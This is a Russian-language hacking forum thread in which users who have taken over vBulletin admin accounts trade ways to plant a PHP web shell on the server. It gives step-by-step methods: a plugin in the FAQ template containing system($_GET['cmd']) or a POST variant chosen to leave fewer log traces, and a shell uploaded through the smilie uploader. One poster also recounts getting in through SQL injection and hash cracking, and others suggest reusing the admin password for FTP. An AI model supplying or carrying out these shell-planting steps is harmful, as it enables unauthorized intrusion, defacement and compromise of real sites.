Вот возникла проблема. Взял админский акк на булке, захожу в админку, добавляю новый тип прикрепляемого файла - php (phtml тоже пробывал), MIME - ставлю application/octet-stream. Создаю новую тему, прикрепляю мой шелл, при переходе по ссылке выполняются только html теги, ПХП не хочет

Кто нибудь знает можно ли что нибудь тут сделать?

Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
Почемубы не сдлеать так? Зальещ шелл, а потом просто удалиш это.

А лучше system($_POST["cmd"]);

так меньше следов будет в ЛОгах тогда Получим запрос:

www.xz.сom/forumpath/faq.php?
POST: cmd=[command]

форум 3 0 1, там вообще ФАКа нет. Меня интересует возможность заливки шела аттачем

Насколько я знаю, аттачи в булке хранятся в бд...

Способ заливки шелла в vBulletin 2.*.* и 3.0.*
1. Заходим в админку.
2. Смайлы.
3. Загрузить смайл.
4. Грузим наш шелл. (папка по умолчанию /images/smilies)
5. Заходим www.xz.сom/forumpath/images/smilies/shell.php

Чем тебе не способ... с тебя + к репе

Sharky, еслиб ты ещё придумал этот способ то я поставил БЫ тебе +. Ты думаешь я не пробывал через смайлы заливать? =)

Та же история (есть админка надо шелл). Никакого способа не вижу кроме через аттач.

Насколько я знаю, аттачи в булке хранятся в бд...

Как обойти? В админке есть какие-то настройки. Что-то типа "Переместить аттачи на винт", но не пробовал пока что бы не привлекать внимание. Может кто знает.

Вам шелл нужен что бы дэфэйс поставить?

']Вам шелл нужен что бы дэфэйс поставить?

Не знаю для чего шелл нужен автору темы.

А меня вопрос немного удивил. Что тут ответить: "Нет ну что Вы какой дефейс я из спортивного интереса ведь я белый и пушистый"
или "Ну конечно для дефейса, а для чего же еще"
Вот тут и вопрос, а чем мы тут все занимаемся?
Ясен пень не дефейсить сайты учимся! А вот получить ответ на вопрос "можно ли залить шелл через аттач в указаном форуме" хотелось бы. А для чего, решать каждому в меру своей испорченности. У меня хобби найти ошибку и сказать админу сайта и параллельно узнать что-то новое. Я вот настолько ипорчен.
Извините за длинный пост. Вопрос остаеться в силе. Можно залить или нет? Если да то как.
И вопрос не означеет что я буду тупо сидеть и ждать когда мне все принесут на блюде, я тоже ищу ответы, в том числе и на форуме. Буду рад любой помощи очень мало инфы по vBulletin v3.6.2.

Нельзя!

Ого как быстро и уверено! А почему? В теории кажется все просто закинул файл, зашел по ссылке. В чем прикол, почему не катит такое?

Ого как быстро и уверено! А почему? В теории кажется все просто закинул файл, зашел по ссылке. В чем прикол, почему не катит такое?
Чел если бы было така маза то щас бы щас все и вся ресурсы имеллИ! . . .. // / / / Ты сам немного мозгами по рассикнЬЬЬ. / / /

Если админ булки - хозяин сайта, то 50% что пасс от фтп такой же что и от админки :)

Ps :d

n0ne
35 % что тот же ))

// / / / Ты сам немного мозгами по рассикнЬЬЬ. / / /

Да я раскидываю уже долго (может маловато чем раскидывать). Я понимаю что если бы обычным пользователям было разрешено грузить любые файлы то и ломать нечего не надо... Но просто так аттачем нельзя загрузить php файл. И вот тут мне не понятно. Если я в админке добавлю новый тип аттачей (php), переключу хранение аттачей на диске, т.е. сделаю то что предлагает автор темы. Заливаем файл. Почему не выполниться php. Где эти настройки.
Ну и если все-таки нельзя, то получается владение админкой форума на сайте не дает способа вторжения на сайт? Я не рассматриваю варианты забанить половину юзеров, и поудалять все сообщения, это не нафиг не нужно.
З.Ы.
В моем случае ситуация такая нашел sql-inj получил хеши и подобрал несколько. Один из паролей пренадлежит админу (не хозяину сайта, хеш хозяина не поддался). Вот вошел в админку, а дальше тупик.... уже долго.